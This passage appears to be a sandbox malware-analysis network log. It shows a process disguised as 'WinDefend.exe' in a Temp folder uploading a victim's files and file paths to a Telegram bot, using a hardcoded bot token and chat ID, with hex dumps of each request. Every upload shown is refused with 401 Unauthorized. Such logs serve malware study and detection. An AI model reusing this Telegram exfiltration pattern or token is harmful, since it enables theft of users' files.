2024-05-23 13:34:59 UTC	191	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 69 6c 6c 75 73 74 72 61 74 69 6f 6e 73 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 73 74 61 74 69 63 25 35 43 69 6d 61 67 65 73 25 35 43 69 6c 6c 75 73 74 72 61 74 69 6f 6e 73 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 34 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+illustrations.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Cstatic%5Cimages%5Cillustrations.png%0ASize%3A+4+KB
2024-05-23 13:34:59 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:59 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.5	61155	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:59 UTC	235	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="282cf0c9-a535-4b59-94fe-489052a78285" Host: api.telegram.org Content-Length: 109107 Expect: 100-continue
2024-05-23 13:34:59 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:59 UTC	40	OUT	Data Raw: 2d 2d 32 38 32 63 66 30 63 39 2d 61 35 33 35 2d 34 62 35 39 2d 39 34 66 65 2d 34 38 39 30 35 32 61 37 38 32 38 35 0d 0a Data Ascii: --282cf0c9-a535-4b59-94fe-489052a78285
2024-05-23 13:34:59 UTC	119	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 53 74 61 6e 64 61 72 64 42 75 73 69 6e 65 73 73 2e 70 64 66 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 53 74 61 6e 64 61 72 64 42 75 73 69 6e 65 73 73 2e 70 64 66 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=StandardBusiness.pdf; filename*=utf-8''StandardBusiness.pdf
2024-05-23 13:34:59 UTC	4096	OUT	Data Raw: 25 50 44 46 2d 31 2e 34 0d 25 e2 e3 cf d3 0d 0a 32 34 31 20 30 20 6f 62 6a 0d 3c 3c 20 0d 2f 4c 69 6e 65 61 72 69 7a 65 64 20 31 20 0d 2f 4f 20 32 34 34 20 0d 2f 48 20 5b 20 39 36 34 20 33 31 34 20 5d 20 0d 2f 4c 20 31 30 38 37 36 33 20 0d 2f 45 20 36 39 37 35 20 0d 2f 4e 20 31 32 20 0d 2f 54 20 31 30 33 38 32 34 20 0d 3e 3e 20 0d 65 6e 64 6f 62 6a 0d 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 72 65 66 0d 32 34 31 20 32 34 20 0d 30 30 30 30 30 30 30 30 31 36 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 30 38 33 31 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 30 39 32 33 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 31 32 37 Data Ascii: %PDF-1.4%241 0 obj<< /Linearized 1 /O 244 /H [ 964 314 ] /L 108763 /E 6975 /N 12 /T 103824 >> endobj xref241 24 0000000016 00000 n0000000831 00000 n0000000923 00000 n000000127
2024-05-23 13:34:59 UTC	4096	OUT	Data Raw: e9 5f 69 a9 b1 cb ca 1a 42 2b b5 cb 24 e7 c4 a8 2a 91 37 c1 08 10 c6 95 2d ab 5e 09 c2 a9 05 01 6f ce d4 6b 43 7f 33 0c a1 19 3a 24 ea 6a 9f 78 03 d3 62 d1 08 10 ae 36 a1 ad 50 dc 13 c3 43 69 d9 bb 2e 8c 87 17 47 5b 82 65 a2 25 8a 37 98 88 01 5b fa a0 87 47 4f 8f 4c f4 7f 09 fe e0 6b ef 22 11 57 71 6d 99 0f f1 b7 ba 3a 62 08 0d e6 c0 b6 79 05 7d 19 0e e2 9a da 1e 54 c3 68 31 48 6a 78 19 44 1f 6d 01 19 57 62 10 16 5d 5a c3 f2 34 80 d7 25 3b f5 4c 41 86 96 d6 3b 5f 21 b2 ab ff c7 9f df ee fe 2f c0 00 34 13 d4 78 0d 65 6e 64 73 74 72 65 61 6d 0d 65 6e 64 6f 62 6a 0d 32 34 39 20 30 20 6f 62 6a 0d 32 33 39 34 20 0d 65 6e 64 6f 62 6a 0d 32 35 30 20 30 20 6f 62 6a 0d 5b 20 0d 31 20 30 20 0d 5d 0d 65 6e 64 6f 62 6a 0d 32 35 31 20 30 20 6f 62 6a 0d 3c 3c 20 0d 2f Data Ascii: _iB+$*7-^okC3:$jxb6PCi.G[e%7[GOLk"Wqm:by}Th1HjxDmWb]Z4%;LA;_!/4xendstreamendobj249 0 obj2394 endobj250 0 obj[ 1 0 ]endobj251 0 obj<< /
2024-05-23 13:34:59 UTC	4096	OUT	Data Raw: dd f9 82 5a 51 a5 b4 77 b2 28 2a 0d d8 41 ba f8 30 59 c4 3b 51 2d e0 ac 4c d6 bf ec 53 0f 0c 92 d3 2a 3e 0b 60 31 75 c0 59 d4 f5 68 9d 8f 14 23 57 32 8a 4b 45 37 d5 94 1b 26 56 a4 02 73 a1 d4 18 27 0c 26 c0 1c e7 cb 0e 85 97 78 b6 b7 72 97 85 65 01 de 49 d2 c0 ea 89 c4 ce 8e 67 d1 a6 90 33 d9 8a af ac 28 65 ec be a8 d7 2d 13 48 53 f4 ca 61 63 c3 58 1f 34 a5 62 87 07 88 4a c9 3e be f0 42 09 c5 8b 95 9c ac 3e d0 15 b0 11 59 98 e0 52 f1 88 19 8d 2e e0 01 d5 dc 18 f2 94 25 be 43 21 88 ec 78 d6 e8 cc 44 d2 90 7b 8b bc 61 3c 0d 63 75 07 06 b6 ea 12 38 53 90 4d 6b 41 1c 23 20 c9 60 10 66 2a d7 5e 76 6b 8e a2 43 b9 b0 3d c6 b2 29 f7 db 08 11 44 c5 29 de c7 d6 fc a1 8a 16 37 81 4c 92 36 14 8d 23 b5 b8 61 ba 23 15 c0 5a 57 84 a3 48 3c 46 68 60 34 84 ed 25 3b d9 7d Data Ascii: ZQw(A0Y;Q-LS>`1uYh#W2KE7&Vs'&xreIg3(e-HSacX4bJ>B>YR.%C!xD{a<cu8SMkA# `f*^vkC=)D)7L6#a#ZWH<Fh`4%;}
2024-05-23 13:34:59 UTC	4096	OUT	Data Raw: 20 0d 2f 45 78 74 47 53 74 61 74 65 20 3c 3c 20 2f 47 53 30 20 32 38 20 30 20 52 20 2f 47 53 31 20 32 39 20 30 20 52 20 3e 3e 20 3e 3e 20 0d 2f 50 69 65 63 65 49 6e 66 6f 20 3c 3c 20 2f 49 6c 6c 75 73 74 72 61 74 6f 72 20 33 31 20 30 20 52 20 3e 3e 20 0d 2f 4c 61 73 74 4d 6f 64 69 66 69 65 64 20 28 44 3a 32 30 30 33 30 31 30 38 31 34 34 36 32 30 2d 30 38 27 30 30 27 29 0d 2f 41 72 74 42 6f 78 20 5b 20 32 35 32 2e 36 30 32 35 34 20 33 37 32 2e 39 37 36 35 36 20 33 36 30 2e 37 34 35 31 32 20 34 31 37 2e 37 32 34 36 31 20 5d 20 0d 2f 47 72 6f 75 70 20 33 30 20 30 20 52 20 0d 2f 54 68 75 6d 62 20 32 31 35 20 30 20 52 20 0d 2f 43 6f 6e 74 65 6e 74 73 20 31 39 20 30 20 52 20 0d 2f 50 61 72 65 6e 74 20 32 33 38 20 30 20 52 20 0d 2f 43 72 6f 70 42 6f 78 20 5b 20 Data Ascii: /ExtGState << /GS0 28 0 R /GS1 29 0 R >> >> /PieceInfo << /Illustrator 31 0 R >> /LastModified (D:20030108144620-08'00')/ArtBox [ 252.60254 372.97656 360.74512 417.72461 ] /Group 30 0 R /Thumb 215 0 R /Contents 19 0 R /Parent 238 0 R /CropBox [
2024-05-23 13:34:59 UTC	4096	OUT	Data Raw: 74 74 65 72 6e 20 3c 3c 20 2f 50 30 20 34 33 20 30 20 52 20 3e 3e 20 0d 2f 45 78 74 47 53 74 61 74 65 20 3c 3c 20 2f 47 53 30 20 34 34 20 30 20 52 20 2f 47 53 31 20 34 35 20 30 20 52 20 3e 3e 20 3e 3e 20 0d 2f 50 69 65 63 65 49 6e 66 6f 20 3c 3c 20 2f 49 6c 6c 75 73 74 72 61 74 6f 72 20 34 37 20 30 20 52 20 3e 3e 20 0d 2f 4c 61 73 74 4d 6f 64 69 66 69 65 64 20 28 44 3a 32 30 30 33 30 31 30 38 31 34 34 36 34 32 2d 30 38 27 30 30 27 29 0d 2f 41 72 74 42 6f 78 20 5b 20 32 36 30 2e 32 31 31 39 31 20 33 37 33 2e 32 34 32 31 39 20 33 35 33 2e 30 30 36 38 34 20 34 31 37 2e 39 38 39 37 35 20 5d 20 0d 2f 47 72 6f 75 70 20 34 36 20 30 20 52 20 0d 2f 54 68 75 6d 62 20 32 31 37 20 30 20 52 20 0d 2f 43 6f 6e 74 65 6e 74 73 20 33 35 20 30 20 52 20 0d 2f 50 61 72 65 6e Data Ascii: ttern << /P0 43 0 R >> /ExtGState << /GS0 44 0 R /GS1 45 0 R >> >> /PieceInfo << /Illustrator 47 0 R >> /LastModified (D:20030108144642-08'00')/ArtBox [ 260.21191 373.24219 353.00684 417.98975 ] /Group 46 0 R /Thumb 217 0 R /Contents 35 0 R /Paren
2024-05-23 13:34:59 UTC	4096	OUT	Data Raw: b9 0d fc 05 fd 1f de 31 b9 68 48 91 fa 02 16 3e c4 5e 2c 10 64 11 c3 5e e4 62 f8 30 69 b7 9d 0e 66 c6 8b 9e f6 2e f6 df a7 48 a9 fb e9 b5 27 c7 dc 72 30 30 5d d6 93 a8 62 b1 48 dd bd f9 ba ff f6 78 78 3a bf 3f 9c bf fd ba fc f0 c3 dd db fb 2f 87 bf 9f 8e 5f 8e 4f cb 07 a1 45 78 f9 78 f7 ee db c3 e1 74 01 69 a1 e5 e3 ab 57 6f de ee ee fe 76 ff c7 e1 64 1f fd 72 3c 3f 1c 96 3f f5 df fc e7 bb 7f 1c 9f 8f ff 04 72 3e 7d 3b 2c 77 6f 4f 87 df 8e 87 df c7 af 1f 3f 1d cf f7 f3 7f 1e 9f ce 87 4f e3 d7 9b e3 e3 23 7e 7c be 7f 78 c6 af d7 5f 1f be 9e 96 0f 91 62 d4 45 62 c9 75 c9 29 49 42 48 9f 1f ee cf fd b8 b1 f6 97 d3 fd d3 f3 af f7 a7 c3 d3 fe 8f 81 bd 7a f5 97 37 af 77 b8 d1 f9 7c 38 3d 2d fb 67 9c 46 cb f3 fe 69 47 cb 71 d9 dd bd 3b 60 93 e3 6f 07 3f e6 f8 78 Data Ascii: 1hH>^,d^b0if.H'r00]bHxx:?/_OExxtiWovdr<??r>};,woO?O#~\|x_bEbu)IBHz7w\|8=-gFiGq;`o?x
2024-05-23 13:34:59 UTC	4096	OUT	Data Raw: 6c 75 74 69 6f 6e 3a 20 38 30 30 0d 25 41 49 35 5f 4e 75 6d 4c 61 79 65 72 73 3a 20 31 0d 25 41 49 39 5f 4f 70 65 6e 54 6f 56 69 65 77 3a 20 2d 33 32 34 20 38 34 33 20 31 20 31 32 36 36 20 39 30 37 20 32 36 20 30 20 31 20 37 20 34 32 20 30 20 30 20 31 20 31 20 31 20 30 0d 25 41 49 35 5f 4f 70 65 6e 56 69 65 77 4c 61 79 65 72 73 3a 20 37 0d 25 25 50 61 67 65 4f 72 69 67 69 6e 3a 33 30 20 33 31 0d 25 25 41 49 33 5f 50 61 70 65 72 52 65 63 74 3a 2d 33 30 20 37 36 31 20 35 38 32 20 2d 33 31 0d 25 25 41 49 33 5f 4d 61 72 67 69 6e 3a 33 30 20 2d 33 31 20 2d 33 30 20 33 31 0d 25 41 49 37 5f 47 72 69 64 53 65 74 74 69 6e 67 73 3a 20 37 32 20 38 20 37 32 20 38 20 31 20 30 20 30 2e 38 20 30 2e 38 20 30 2e 38 20 30 2e 39 20 30 2e 39 20 30 2e 39 0d 25 41 49 39 5f 46 Data Ascii: lution: 800%AI5_NumLayers: 1%AI9_OpenToView: -324 843 1 1266 907 26 0 1 7 42 0 0 1 1 1 0%AI5_OpenViewLayers: 7%%PageOrigin:30 31%%AI3_PaperRect:-30 761 582 -31%%AI3_Margin:30 -31 -30 31%AI7_GridSettings: 72 8 72 8 1 0 0.8 0.8 0.8 0.9 0.9 0.9%AI9_F
2024-05-23 13:34:59 UTC	4096	OUT	Data Raw: 74 6f 72 28 52 29 20 31 30 2e 30 0d 25 25 41 49 38 5f 43 72 65 61 74 6f 72 56 65 72 73 69 6f 6e 3a 20 31 30 2e 30 0d 25 25 46 6f 72 3a 20 28 4b 65 6c 6c 69 65 20 53 75 74 68 65 72 6c 61 6e 64 29 20 28 41 64 6f 62 65 20 53 79 73 74 65 6d 73 29 0d 25 25 54 69 74 6c 65 3a 20 28 55 6e 74 69 74 6c 65 64 2d 33 36 29 0d 25 25 43 72 65 61 74 69 6f 6e 44 61 74 65 3a 20 31 2f 38 2f 30 33 20 32 3a 34 37 20 50 4d 0d 25 25 42 6f 75 6e 64 69 6e 67 42 6f 78 3a 20 32 30 35 20 33 37 33 20 34 31 30 20 34 31 38 0d 25 25 48 69 52 65 73 42 6f 75 6e 64 69 6e 67 42 6f 78 3a 20 32 30 35 2e 30 35 31 33 20 33 37 33 2e 30 34 36 39 20 34 30 39 2e 36 36 39 39 20 34 31 37 2e 35 34 36 34 0d 25 25 44 6f 63 75 6d 65 6e 74 50 72 6f 63 65 73 73 43 6f 6c 6f 72 73 3a 20 43 79 61 6e 20 4d 61 Data Ascii: tor(R) 10.0%%AI8_CreatorVersion: 10.0%%For: (Kellie Sutherland) (Adobe Systems)%%Title: (Untitled-36)%%CreationDate: 1/8/03 2:47 PM%%BoundingBox: 205 373 410 418%%HiResBoundingBox: 205.0513 373.0469 409.6699 417.5464%%DocumentProcessColors: Cyan Ma
2024-05-23 13:35:00 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:00 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.5	61156	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:00 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="42b883b6-8606-433d-a882-3565fa153195" Host: api.telegram.org Content-Length: 2729 Expect: 100-continue
2024-05-23 13:35:00 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:00 UTC	40	OUT	Data Raw: 2d 2d 34 32 62 38 38 33 62 36 2d 38 36 30 36 2d 34 33 33 64 2d 61 38 38 32 2d 33 35 36 35 66 61 31 35 33 31 39 35 0d 0a Data Ascii: --42b883b6-8606-433d-a882-3565fa153195
2024-05-23 13:35:00 UTC	91	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 34 38 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 34 38 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=48.png; filename*=utf-8''48.png
2024-05-23 13:35:00 UTC	2413	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 06 00 00 00 57 02 f9 87 00 00 09 34 49 44 41 54 68 81 ed 99 5f a8 65 55 1d c7 3f bf b5 f7 3d f7 de b9 e7 7a 67 46 9d 44 6b 0a 8d 90 70 2a d0 1e 4a 85 21 5f 22 8d 44 0c 42 f0 21 c2 87 e8 2d 08 a2 87 1a ec c9 97 e8 a9 48 70 8c c4 0c cb ca 7c 30 30 99 07 0d 7d 4a 8d 92 88 34 bc 65 ce 28 33 e3 dc ff e7 9c bd 7f df 1e d6 5a fb ac 73 ce bd 33 13 04 fd 61 16 1c ce 39 7b af 3f df df f7 f7 fd fd d6 6f ed 0d 97 da a5 76 a9 fd ff 35 81 3d 0e 95 3e 1f 3f 27 8e 52 9f 38 4a 2d a8 04 d5 e3 f1 3b 5c e0 63 53 9f f3 f6 4f 73 56 82 ea 04 d4 27 98 59 cf 2e 06 78 b8 a8 8e ff a1 96 89 28 af d5 c5 cd 60 e0 00 ef de 73 d7 b5 83 ad ed 0f 56 cd e8 2a f7 e6 00 a2 4f ab 25 dc 97 51 b3 cf 9d 05 33 7a b8 cf 99 Data Ascii: PNGIHDR00W4IDATh_eU?=zgFDkpJ!_"DB!-Hp\|00}J4e(3Zs3a9{?ov5=>?'R8J-;\cSOsV'Y.x(`sVO%Q3z
2024-05-23 13:35:00 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 34 32 62 38 38 33 62 36 2d 38 36 30 36 2d 34 33 33 64 2d 61 38 38 32 2d 33 35 36 35 66 61 31 35 33 31 39 35 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --42b883b6-8606-433d-a882-3565fa153195Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:00 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:00 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 34 32 62 38 38 33 62 36 2d 38 36 30 36 2d 34 33 33 64 2d 61 38 38 32 2d 33 35 36 35 66 61 31 35 33 31 39 35 2d 2d 0d 0a Data Ascii: --42b883b6-8606-433d-a882-3565fa153195--
2024-05-23 13:35:01 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:00 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.5	61157	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:00 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="5764b627-e435-4025-af22-690304ebe0db" Host: api.telegram.org Content-Length: 4823 Expect: 100-continue
2024-05-23 13:35:01 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:01 UTC	40	OUT	Data Raw: 2d 2d 35 37 36 34 62 36 32 37 2d 65 34 33 35 2d 34 30 32 35 2d 61 66 32 32 2d 36 39 30 33 30 34 65 62 65 30 64 62 0d 0a Data Ascii: --5764b627-e435-4025-af22-690304ebe0db
2024-05-23 13:35:01 UTC	113	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 69 6c 6c 75 73 74 72 61 74 69 6f 6e 73 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 69 6c 6c 75 73 74 72 61 74 69 6f 6e 73 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=illustrations.png; filename*=utf-8''illustrations.png
2024-05-23 13:35:01 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 f4 00 00 02 58 08 03 00 00 00 a3 3e e4 b0 00 00 00 03 73 42 49 54 08 08 08 db e1 4f e0 00 00 00 60 50 4c 54 45 ff ff ff bb bb bb 99 99 99 bb bb bb cd a4 96 99 99 99 bb bb bb 99 99 99 bb bb bb 99 99 99 bb bb bb 99 99 99 bb bb bb 99 99 99 bb bb bb 99 99 99 bb bb bb 99 99 99 bb bb bb 99 99 99 bb bb bb 99 99 99 bb bb bb 99 99 99 bb bb bb 99 99 99 bb bb bb 99 99 99 bb bb bb 99 99 99 bb bb bb 99 99 99 2d 05 9b 46 00 00 00 20 74 52 4e 53 00 11 11 22 22 22 33 33 44 44 55 55 66 66 77 77 88 88 99 99 aa aa bb bb cc cc dd dd ee ee ff ff 8d 9e 05 3f 00 00 00 09 70 48 59 73 00 00 0a 4d 00 00 0a 4d 01 b5 93 e4 c6 00 00 00 1c 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 46 69 72 65 77 6f 72 6b 73 20 43 Data Ascii: PNGIHDRX>sBITO`PLTE-F tRNS"""33DDUUffww?pHYsMMtEXtSoftwareAdobe Fireworks C
2024-05-23 13:35:01 UTC	389	OUT	Data Raw: d7 3d 39 69 99 f5 2e b7 fa 42 2f f4 cb 4f 41 3a f7 35 84 be 6a 99 de 52 fb 9a 6a 4f e8 47 fd e2 81 75 9f 1c a1 4f eb a0 e7 76 39 19 a7 73 c6 d0 f7 ad 6e 22 c4 b6 cc 03 a1 4f ac 6c 25 57 9b 36 e7 4c a1 e7 ad 4e 22 d4 80 fe 42 e8 d3 ab 2e ed f0 ba 23 73 37 f4 5d e7 32 9f b3 c9 2d 84 3e 35 7d b5 6e 6e ec 9d d0 3b cd 3c d0 0a fd 81 d0 27 97 76 02 bc 1c 5b 23 7b 3a d4 cc 05 f7 e4 1d 10 fa f4 da 53 f8 7b 86 b9 d6 70 f5 d0 db d3 80 4b c0 89 fb 1b 42 9f c1 ae 9b fa e5 ac f6 f1 ff b3 f6 ec b6 6d 9d 51 08 7d 0e bb 6e 8e b7 d5 5b 13 7b d3 d2 f3 ce 0c e0 2e 6c e6 84 3e 0f 53 5b 57 62 4f ad 91 07 6e e7 84 3e 17 c3 b8 fe d6 c9 3f 36 5c 1e a1 17 c6 c8 03 8f e7 77 53 6e 4a 13 ba 22 33 27 7a a9 8b f4 2d f4 7d 69 fe 58 5c ce c1 33 27 f4 d9 24 dd 75 d8 bb 6a 9f e5 ed 2d d7 Data Ascii: =9i.B/OA:5jRjOGuOv9sn"Ol%W6LN"B.#s7]2->5}nn;<'v[#{:S{pKBmQ}n[{.l>S[WbOn>?6\wSnJ"3'z-}iX\3'$uj-
2024-05-23 13:35:01 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 35 37 36 34 62 36 32 37 2d 65 34 33 35 2d 34 30 32 35 2d 61 66 32 32 2d 36 39 30 33 30 34 65 62 65 30 64 62 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --5764b627-e435-4025-af22-690304ebe0dbContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:01 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:01 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 35 37 36 34 62 36 32 37 2d 65 34 33 35 2d 34 30 32 35 2d 61 66 32 32 2d 36 39 30 33 30 34 65 62 65 30 64 62 2d 2d 0d 0a Data Ascii: --5764b627-e435-4025-af22-690304ebe0db--
2024-05-23 13:35:01 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:01 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.5	61158	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:00 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 257 Expect: 100-continue
2024-05-23 13:35:01 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:01 UTC	257	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 30 34 64 64 62 64 66 66 36 33 39 36 64 39 38 38 30 37 62 63 30 62 36 61 34 61 66 31 39 33 38 63 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 61 70 70 31 25 35 43 64 63 2d 64 65 73 6b 74 6f 70 2d 61 70 70 2d 64 72 6f 70 69 6e 25 35 43 31 2e 30 2e 30 5f 31 2e 30 2e 30 25 35 43 30 34 64 64 62 64 66 66 36 33 39 36 64 39 38 38 30 37 62 63 30 62 36 61 34 61 66 31 39 33 38 63 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 32 30 2b Data Ascii: chat_id=1655240967&text=File%3A+04ddbdff6396d98807bc0b6a4af1938c.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Capp1%5Cdc-desktop-app-dropin%5C1.0.0_1.0.0%5C04ddbdff6396d98807bc0b6a4af1938c.png%0ASize%3A+20+
2024-05-23 13:35:01 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:01 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.5	61161	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:03 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 206 Expect: 100-continue
2024-05-23 13:35:03 UTC	25	IN	HTTP/1.1 100 Continue
